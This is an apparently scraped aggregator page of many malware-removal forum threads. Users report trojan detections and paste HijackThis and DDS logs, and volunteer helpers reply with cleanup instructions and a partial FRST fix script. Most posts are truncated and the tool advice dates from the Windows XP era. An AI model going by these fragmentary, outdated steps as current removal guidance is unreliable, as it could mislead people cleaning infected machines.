Greetings Phydron and to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary. If you would allow me to call you by your first name I would prefer to do that. ===================================================Ground Rules:First, I would also like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance. Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.Please copy and paste all logs into your post unless directed otherwise. Please do... Read more

30 more replies
Answer Match 50.4%

I've been trying to disinfect this computer for a friend, and more viruses keep coming back. I've scanned with AVG 8 free (main antivirus), malwarebytes, sdfix, and superanti spyware. For a little while it wouldn't log on normally, only showing the background with no icons or system tray, but I got in safe mode and ran malwarebytes and cleaned the registry and all files with ccleaner and I can now log on again.Currently, AVG resident shield continually pops up with infected items, on open of certain folders and files, and on startup with a bunch. Some viruses its told me it found were adware generic3.akgs, trojan downloader bho.hun (i think), and some registry infections of ms juan and new juan.HiJack This LogLogfile of Trend Micro HijackThis v2.0.2Scan saved at 6:21:50 PM, on 2/21/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16791)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Intel\IntelDH\CCU\AlertService.exeC:... Read more

A:infected trojan downloader/ms juan/win32 heur

Hi,I have bad news for you I see you're dealing with Virut on top of the other nasty malware you are dealing with. In that case, it's unfortunately a lost case - Game over situation and a format and reinstall is the fastest and especially the safest solution.You may want to read this why:Virut and other File infectors - Throwing in the Towel? So, I suggest you to start backup all of your valuable data/documents/pictures/movies/songs/etc.. Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files...This because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.Read here for instructions how to format and reinstall Windows: http://web.mit.edu/ist/products/winxp/adva...all-format.html

4 more replies
Answer Match 50.4%

AVG found and "removed" six infections during my daily scan. I uninstalled my spam filter (by Codeode, which seemed to be the source of, or harbor for, the infections. They were found again last night (see below). Any ideas? I'm wondering why AVG didn't catch and prevent the infections in the first place. From what I've read, they seem bad. THANK YOU.

AVG Scan History - Infections Detail
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0:\D1074a060.zip";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0:\D1074a060.zip:\D1074a060.exe";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\45337C5D5A0733430F6B04741239141559272860";"Trojan horse BackDoor.Generic11.ALD... Read more

More replies
Answer Match 50.4%

A couple of days ago I updated my AVG. I'm not sure what happened, but during the process my antivirus was disabled, computer was attacked by a virus or hijacker. It would not let me update the AVG, redirected me, changed my homepage, would not let me acces the net. It changed my settings and modified my display, removed my wallpaper. In my Internet Properties, I disabled add ons under manage add ons that looked unfamiliar to me.

Live365Player Class
(not verified) Live365.com

MCCWrqapper Obj Class
(not verified) Motive Communications, Inc.

MJ Launcher Ctrl Class
(not verified) Mumbo Jumbo
BDSCANONLINE

With that I was able access the net, and complete the update to my AVG. I rebooted. My desktop is now blue with wording and a link that says "Warning: Spyware threat has been detected on your PC" below it a live link that says "Click Here To Scan For Spyware". I have a strange Icon in my system tray that is a crude looking warning icon with an exclaimation point that pops up a message and that has several different warnigs. "Click for security updates, your computer is infected with spyware, click here to run a full system scan", etc.

I also get warnings from AVG: Danger: AVG Search-Shield has detected active threats on this page and has blocked access for your protection. The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Wi... Read more

A:Solved: Trojan horse Generic10.QTX, Win32/Heur Please Help.

16 more replies
Answer Match 50.4%

I have Charter Security Suite (F-Secure Antivirus) installed and the history shows the 2 files have attempted to be cleaned but without success. I couldn't understand their help documents to manually clean them, so I am asking for your help. You all helped me once before with great success, I am hoping you can do it again! Thankyou.

DDS (Ver_09-12-01.01) - NTFSx86
Run by Michele at 7:19:32.14 on Mon 03/15/2010
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.511.127 [GMT -5:00]

AV: Charter Security Suite 9.01 *On-access scanning enabled* (Updated) {E7512ED5-4245-4B4D-AF3A-382D3F313F15}
FW: Charter Security Suite 9.01 *enabled* {D4747503-0346-49EB-9262-997542F79BF4}

============== Running Processes ===============

H:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
H:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
H:\WINDOWS\System32\svchost.exe -k eapsvcs
svchost.exe
H:\WINDOWS\System32\svchost.exe -k dot3svc
H:\WINDOWS\system32\spoolsv.exe
svchost.exe
H:\WINDOWS\system32\netdde.exe
H:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
H:\Program Files\Bonjour\mDNSResponder.exe
H:\WINDOWS\system32\clipsrv.exe
H:\Program Files\Charter Security Suite\Anti-Virus\fsgk32st.exe
H:\Program Files\... Read more

A:Trojan.Generic.2187084, [email protected]

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

8 more replies
Answer Match 50.4%

I have a dell home pc with windows xp with kaspersky 2011 on it. I have a virus that I can not fix using my kaspersky program so far. The virus is heur:trojan script genertic. I need simple instructions to remove this please.

A:removal of Heur:trojan scripts genertic virus

Hello, I moved this to the Am I INfected forum.Does the kis detected log say infected (nothing about removal) with the time stamp. Or what exactly does the log say about the finding?

1 more replies
Answer Match 50.4%

Here's what i know. I have been given my husbands old computer upon recieving it i went to try and update windows to SP3. The computer installed but then would stall at the windows loading screen. I uninstalled the update and ran Kaspersky 8.0.0.454. Which then told me of numerous instances of HEUR:Worm.Win32.Generic. I tried to quarentine them from the report page but that did nothing. I have since rerun the scan and managed to catch 6 pop up boxes from Kasperskey to quarentine the worm. Only to run another full scan and find more copies still plus now Trojan.JS.Agent.ja and Trojan-Downloader.JS.plif.a
I am wondering if the worms are even getting quarentined at all and how each scan still finds them and now the trojans that it didn't seem to see before.

This is a Dell XPS Gen 4 running Windows XP SP2

Would really appriciate some advice, here is the hijackThis log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:42:33 PM, on 3/31/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2009\avp.exe
C:\Program Files\... Read more

A:HEUR:Worm.Win32.generic and Trojan Program

BUMP
Please help, thanks
 

1 more replies
Answer Match 50.4%

Bit Defender popped up and prompted me letting me know that these two viruses were id'd but could not be quarantined/removed. Here is the DDS log. GMER crashed my computer twice in a row so it will not run. No other errors yet.DDS (Ver_10-03-17.01) - NTFSx86 Run by user at 9:55:13.51 on Sat 07/31/2010Internet Explorer: 8.0.6001.18928Microsoft? Windows Vista? Home Premium 6.0.6002.2.1252.1.1033.18.3261.1970 [GMT -6:00]AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}SP: BitDefender Antispyware *enabled* (Updated) {8B2012EC-32D4-494F-BC03-832DB3BDF911}SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\svchost.exe -k rpcssC:\Windows\System32\svchost.exe -k secsvcsC:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exeC:\Program Files\BitDefender\BitDefender 2009\vsserv.exeC:\Windows\system32\Ati2evxx.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestrictedC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestrictedC:\Windows\system32&... Read more

A:Infected with [email protected] and variant.hiloti.1

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 50.4%

AVG got most of the trojan. One dll found that I was corrupt - c:windows\system32\clbdll.dll was moved to the vault by AVG, but still have issues - ran thru the 5 steps -
winXP SP3 will not load - windows cannot find clbcatq.dll or clbcatex.dll
I tried both SP3 and SP3 for IT Professionals. I'm running WinXP Home Ed.
Did not go into the COM+ fix.
-----------------------------------------------------------------------
ActiveScan.txt attached.
-----------------------------------------------------------------------
Deckard did not create an "extra.txt" file, but here's main.txt:
-----------------------------------------------------------------------

Deckard's System Scanner v20071014.68
Run by Owner on 2008-08-03 04:44:48
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- HijackThis (run as Owner.exe) -----------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:47:01 AM, on 8/3/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WIN... Read more

A:heur trojan mess - Cannot Update OS - SP3 cannot find CLBCATQ dll's

Hello and welcome to TSF.

Sorry for the delayed response. If you have not received help elsewhere and still need help please post a fresh main.txt produced by the Deckard's System Scanner, as it has been a while since you posted.

19 more replies
Answer Match 50.4%

My avg and avast has picked up these trojans trojan horse bho.eiz , trojan horse vund.t and win31/heur. I have tried the panda site but it wouldnt scan for me so then I came to this site to see if someone could help me. I have followed all the steps on the preparation page. When I did step 5 it didnt find anything and wouldnt let me copy a log to paste to you.MAIN.TXTDeckard's System Scanner v20071014.68Run by AuSSie` on 2008-06-15 07:48:19Computer is in Normal Mode.---------------------------------------------------------------------------------- Last 5 Restore Point(s) --11: 2008-06-14 16:17:42 UTC - RP145 - Windows Update10: 2008-06-14 09:57:20 UTC - RP144 - Windows Update9: 2008-06-14 09:43:37 UTC - RP143 - Restore Operation8: 2008-06-14 09:31:30 UTC - RP142 - Restore Operation7: 2008-06-14 06:26:17 UTC - RP141 - Windows Update-- First Restore Point -- 1: 2008-06-10 06:01:26 UTC - RP134 - Scheduled CheckpointBacked up registry hives.Performed disk cleanup.-- HijackThis (run as AuSSie`.exe) ---------------------------------------------Logfile of Trend Micro HijackThis v2.0.2Scan saved at 7:51:34 AM, on 15/06/2008Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v7.00 (7.00.6001.18000)Boot mode: NormalRunning processes:C:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Windows\system32\taskeng.exeC:\Program Files\Windows Defender\MSASCui.exeC:\Program Files\Motorola\SMSERIAL&#... Read more

A:Infected With Trojan Horse Bho.eiz Trojan Horse Vundo.t Win32/heur

HiFirst ... you should NOT be running 2 anti-virus programs, they will conflict ... choose between AVG8 & Avast ... keep one & uninstall the other ...Second ... with the malware showing in your log, I find it hard to believe that the Kaspersky Online Scan found nothing if set to scan My Computer ... If it was not set to scan My Computer, please run it again...THEN ...Please Download Malwarebytes' Anti-Malware from Here :-http://www.majorgeeks.com/Malwarebytes_Ant...ware_d5756.htmlor here :-http://www.besttechie.net/tools/mbam-setup.exeDouble Click mbam-setup.exe to install the application.* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.* If an update is found, it will download and install the latest version.* Once the program has loaded, select "Perform Quick Scan", then click Scan.* The scan may take some time to finish,so please be patient.* When the scan is complete, click OK, then Show Results to view the results.* Make sure that everything is checked, and click Remove Selected.* When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.* Copy and Paste the entire report in your next reply.THEN ...Please follow these directions to run Combofix & post a log.http://www.bleepingcomputer.com/combofix/how-to-use-combofixsteamEDIT ... What are th... Read more

2 more replies
Answer Match 49.98%

Hello there,
I've been experiencing some BSODs lately, I've fixed most of them by updating some drivers, but some are still appearing every two or three days.
I have run full computer scan with Kaspersky Anti-Virus and nothing came up. The only thing was the alert which appeard a few days ago:
 
HEUR:Trojan.Win32.Generic   was recognised.
Object in \Device\Harddisk0\DR0
 
I do not have experience with such things so I'm asking you for help. 
 
My PC is not old, I have it for almost a year now, my system has NVIDIA GeForce GTX 670, Intel Core i7-3770K, 2x4 RAM and it's a Windows 7 Home Premium 64 bit operating system.
 
I have also run BlueScreen View, but I am not sure what files do you need to see some information, I hope it's about the .dmp files, so there are the 5 latest .dmp files from this month:

http://speedy.sh/7eB6t/Desktop.rar
I thank you in advance for your replies,
~ShrimpPL

A:BSODs and HEUR:Trojan.Win32.Generic \Device\Harddisk0\DR0

Hello ShrimpPL I would like to welcome you to the Malware Removal section of the forum.Around here they call me Gringo and I will be glad to help you with your malware problems.Very Important --> Please read this post completely, I have spent my time to put together somethings for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!Please do not run any tools unless instructed to do so.We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same"... Read more

39 more replies
Answer Match 49.98%

I' m using Kaspersky antivirus in a win XP system, and this program has found two virus with this description: HEUR: trojan.win32.invader I've tryed to quarentine them, like the program indicates me to do, after I tryed to clear the infested arquives and also tryed to delete than manualy, but always kaspersky says to restart the PC ans when I do it, kaspersky continue to alert the same problem.

this is the local adress where the archive is: c:\program files\GBplugin\gbiehcef.dll

what can I do to solve it?!

thanks for the patience, I'm not so good with this language

A:HEUR: trojan.win32.invader - I cannot clear or quarentine this!/ Moved

I am shifting this topic from the XP forum to the Am I Infected forum where folks can assist you with this issue. ~ OB

2 more replies
Answer Match 49.98%

Hello- I am reading through the 'Preparation Guide' and following each step closely for maximum efficiency.

Problems started a few nights ago when I was roaming the internet; I wasn't using my Windows Firewall--but have now enabled it as suggested. I use Kaspersky anti-virus (7.0.1.325) - it told me I'd become infected with various Trojans [Trojan.Clicker.Win32.Delf.cbe, Heur.Invader, etc] --- it listed the affected file as C:\WINDOWS\system32\jvwfeead.dll but was unable to delete the file. I tried to do it manually and it gave me access denied messages. My computer slowed and programs didn't want to open. Everything began to freeze up and I had to manually turn off my computer several times before I could get Malwarebytes Anti-Malware to run... It removed a few files but it can't seem to do anything with 4 files [it calls them Vundo]. I've also run combofix, and it found other files it removed, but it also cannot touch some of them. One of the programs mentioned this file is infected: c:\windows\system32\mwvzxdl.dll (although I cannot remember which one) -- however none of my programs will let me delete it, nor does it allow me to manually delete it.

My system is now running fairly smoothly, but I know I am still infected. Visiting sites like 'deviantart' causes my system to go into a frenzy, and the virus seems to redownload itself at random. I haven't had any popups---just extreme slowness, programs freezing or refusing to load, etc. And t... Read more

A:Trojan Dropper/Clicker/Vundo/Heur and other nasties have infected me...

Hello Lisa and welcome to BleepingComputer.com In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.After 5 days if a topic is not replied to we assume it has been abandoned and it is closed.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.I am currently looking at your thread and will post back with instructions soon,regards _temp_

3 more replies
Answer Match 49.98%

Hi, my xp pc are infected with all of these and being hijack.I could not access - 'add-on/remove'at windowmy wdw programme is not running properly.download ComboFix (2) & Malwarebytes exc, but the computer would not let me to run it.i could not control to the website I wanted and sometimes it's being hijacked to some horrible website.had download the dds but it now would not let me open and post upload to this forum.I am novice with computer technology...please kindly advice me what I should do now.And my IE browser had gone too... I could now only use firefox, before that they both work ok .I detected all thie virus by scan with free AVG 8.5 and my firwall is with free PC toolPleaase help...Hi, any response please.As Now I lost the control of my wdw, it stop me doing lots of access.do I really need to re-installed the xp. anyone tell me how to do that.And would I lost every other pre-factory-installed software eg Nero, I don't have back up disc for that, that means I could not use my dvd re-write or re-open any back up there?Help please ...Please..more it would let me go the lots of web site and it limit me resource to find helpful site to remove them.By the way I think my pc get Vundo B.I am now so afraid to go on internet now as I worry there's backdoor open for more attack.I could not delete file now to protect my personal details before I go on internet and I worry if I check my yahoo email account someone would detect my password etc.It's ... Read more

A:win32/Heur, Win/Virut & Trojan Horse clicker.ADLV

As no logs have been posted, I am shifting this topic from the specialized HiJack This forum to the Am I Infected forum.==>PLEASE DO NOT NOW POST LOGS<== unless a log is specifically requested.

2 more replies
Answer Match 49.56%

In the last one week, whenever I am trying to open a web page that I frequently use, I am getting this message from my anti-virus software.

Kaspersky
Anti-Virus
ACCESS DENIED
The requested URL cannot be provided

The requested object at the URL:

hxxp://www.calebgattegno.org/ < warning DO NOT CLICK ON THIS LINK >

Detected:

object is infected by HEUR:Trojan.Script.Generic
Message generated on: 29-07-2014 16:02:48

I went through your post and noticed that another member had asked the same question to you. You had advised the member to download TDSSKIller and FRST. I also did the same and generated four reports, which I am attaching with this mail. Please let me know how I can proceed further. You can find the details of my system as below:

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 7 Home Basic, Service Pack 1, 64 bit
Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz, Intel64 Family 6 Model 37 Stepping 2
Processor Count: 4
RAM: 3892 Mb
Graphics Card: Intel(R) Graphics Media Accelerator HD, 1722 Mb
Hard Drives: C: Total - 235677 MB, Free - 161880 MB; E: Total - 99999 MB, Free - 49833 MB; F: Total - 131531 MB, Free - 28340 MB;
Motherboard: Dell Inc., 0FR6M4
Antivirus: Kaspersky Anti-Virus, Updated and Enabled

I would be very grateful for your early reply, as I am afraid that this virus may cause serious damage to my system.
 

A:Heur:Trojan:Script:Generic virus not allowing me to open a web page

7 more replies
Answer Match 49.56%

Kaspersky detected HEUR:Trojan.Script.iframer or lframer, at the same time a .dll waswhitelisted, maybe related to a javascript on a webpage
Computer OS: Windows 10
Antivirus: Kaspersky 2016
I clicked this page yesteday through google.
abduzeedo.com/star-wars-concept-art-ralph-mcquarrie
-After the page loaded, what was probably a Kaspersky alert window soon appeared together with a sound.
-it said it detected HEUR:Trojan.Script.iframer or HEUR:Trojan.Script.lframer (I am not sure whether that was
a capitalized i or a l)
-I clicked the alert window several times, maybe 4-5 times,  probably out of reflex because I wanted to close it, which may have closed the window (alert window) each time,so I maybe got this window to appear several times in a short time span. (I'm sorry for my bad explanations)
I think the window may have been red.
I might have seen the word whitelist on one of these windows, and this wasn't on the first window that apppeared.
The problem is I am not used to Windows 10 and Kaspersky 2016 and I don't know what an alert window about a blocked object looks like and if there buttons inside the window that I ended up clicking.
But I've deduced is that if HEUR:Trojan.Script.iframer downloaded some object (trojanetc...), that it is possible that I may have unkowingly whitelisted it when I quickly cliked on the Kaspersky alert window(s) that flashed.
 
And I closed the web page after the thing with those alert windows.
I checked Kaspersky's log, and what I... Read more

A:Kaspersky detected HEUR:Trojan.Script.iframer or lframer, .dll whitelisted

Hi there,my name is Jo and I will help you with your computer problems.Please follow these guidelines:Read and follow the instructions in the sequence they are posted.print or copy & save instructions.back up all your private data / music / important files on another (external) drive before using our tools.Do not install / uninstall any applications, unless otherwise instructed.Use only that tools you have been instructed to use.Copy and Paste the log files inside your post, unless otherwise instructed.Ask for clarification, if you have any questions. Stay with this topic til you get the all clean post.My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.*** Download Security Check by screen317 from here or here.Save it to your Desktop.Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.Vista / Windows 7/8 users right-click and select Run As Administrator.A Notepad document should open automatically called checkup.txt; please post the contents of that document.*** Please download Malwarebytes Anti-Rootkit and save it to your desktop.Be sure to print out and follow the instructions provided on that same page.Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.Scan your system for malwareWith some infections, you may see two messages boxes.'Could not load protection driver'. Click 'OK'.'Could ... Read more

22 more replies
Answer Match 49.56%

I don't know how to remove them, our computer automatically shuts down sometimes.

DDS (Ver_09-09-29.01) - NTFSx86
Run by user at 20:03:13.70 on Thu 10/01/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.511.192 [GMT 8:00]
============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\Mixer.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\user\Application Data\Transcend\JFSW2\JFSW2Launch.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\inte... Read more

A:Infected with Win32/Heur, Adware Toolbar.GP, Trojan Horse, Worm

Hello my name is Sempai and welcome to Bleeping Computer.*We apologize for the delay. Forum have been busy.*I want you to understand that I'm still a trainee here. I will be working with my Coach who will approve all my instructions before posting them to you, so there's a possibility to have some delays in my responses. But the good part is, there are two people reviewing your problem instead of one.*It is important not to make any further changes or run any other tools unless instructed to. This may hinder the cleaning process of your machine.*You must reply within 5 days otherwise this topic will be closed.Your log will be analyzed and you will be instructed on what to do next as soon as possible.

13 more replies
Answer Match 49.56%

Hello!My computer has been infested with some kind of a Trojan/rootkit/TDSS, Kaspersky Internet Security 2010 keeps showing the same pop-up windows that SVCHOST.exe is trying to access lenina66 and mfdclk001.org website. It also causes crashes of Firefox and Opera and diverts pages from IE.I ran ATF Cleaner, CCleaner, Java cache clean-up, Malwarebytes' Anti-Malware, SUPERAntiSpyware Free, KIS quick-scan, it didn't help getting rid of this.Here is the KIS screenshot:Merged posts. ~ OB

A:HEUR:Trojan.Win32.Generic / Lenina66.exe / Nasty TDSS virus?

Hello, AtmosphereoWelcome to the Bleeping Computer Forums. My name is Jat, and I will be helping you with your situation.If you do not make a reply in 5 days, we will have to close your topic.You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic. The topics you are tracking can be found here.Please take note of some guidelines for this fix:Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Further more, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only to have the system re-infect itself. Please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply. Only attach them if requested or if t... Read more

1 more replies
Answer Match 49.56%

Hi,
 
Yesterday I started getting popups from Kaspersky, stating that it is blocking malicious urls, even there is no webpage open and running. When I checked the detailed reports, I have seen that it is blocking a trojan named "HEUR:Trojan.ScriptIframer". I ran adwcleaner and rkill. Then I restarted the computer which made me realize the popups starts when the computer is booted even before any browser is open. I googled some stuff and installed malwarebytes and ran a scan with it. It found some malicious files and cleaned them but it didn't solve the issue. Malwarebytes also started to show some popups with different ports and ips but the same process which is "svchost.exe". The popups come up on the startup, when a browser is launched, when a new tab is opened even if it is an empty tab or sometimes when the computer is idle.
 
It is really frustrating as I ran many scans with different tools and none of them seemed to fix the issue. I tried to explain the problem as detailed as possible, the screenshots of the popups are attached. Any help will be appreciated.
 
The log of adwcleaner is pasted below and farbar logs are attached to give it a head start. I couldn't paste the farbar logs because it didn't let me post a message that long so I attached it. Looking to hear from you soon.
 
Thanks.
 
# AdwCleaner v4.104 - Report created 10/12/2015 at 00:27:35
# Updated 05/12/2014 by Xplode
# Database : 2015-12-07.3 [Live]
# Operating System : Windows 7 H... Read more

A:HEUR:Trojan.ScriptIframer constantly blocking malicious urls with svchost.exe

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Remove these programs in bold via the Control Panel > Programs and Features applet.Internet Explorer için Yandex.Bar 6.7 (HKLM-x32\...\{1D1E60B4-BE61-4219-BDF1-5A7622412130}) (Version: 6.7.0.1913 - Yandex)Popcorn Time (HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\...\Popcorn Time) (Version: - Popcorn Official)===ATTENTION: System Restore is disabledHow to: Turn System Restore ON - Windows < Importanthttp://windows.microsoft.com/en-ca/windows/turn-system-restore-on-off#1TC=windows-7<<<>>>Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.Type Notepad and and click the OK key.Please copy the entire contents of the code box below to the a new file. 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe" /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe" /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Tool... Read more

16 more replies
Answer Match 49.56%

Sadly, I am not just saying "Hello, I'm a new member". I am an unhappy, infected member.
I have made many attempts with MalwareBytes and ZoneAlarm Extreme scans over the past few days (both in and out of Safe Mode) and am unable to rid my pc of these pests: Trojan-Banker.Win32.Banbra.advx ; HEUR:Exploit.Script.Generic ; and, also Google Redirect.
Per your instructions, DeFogger was executed and I am attaching DDS.txt, attach.txt, and ark.txt.
Thanks in advance for "being there".
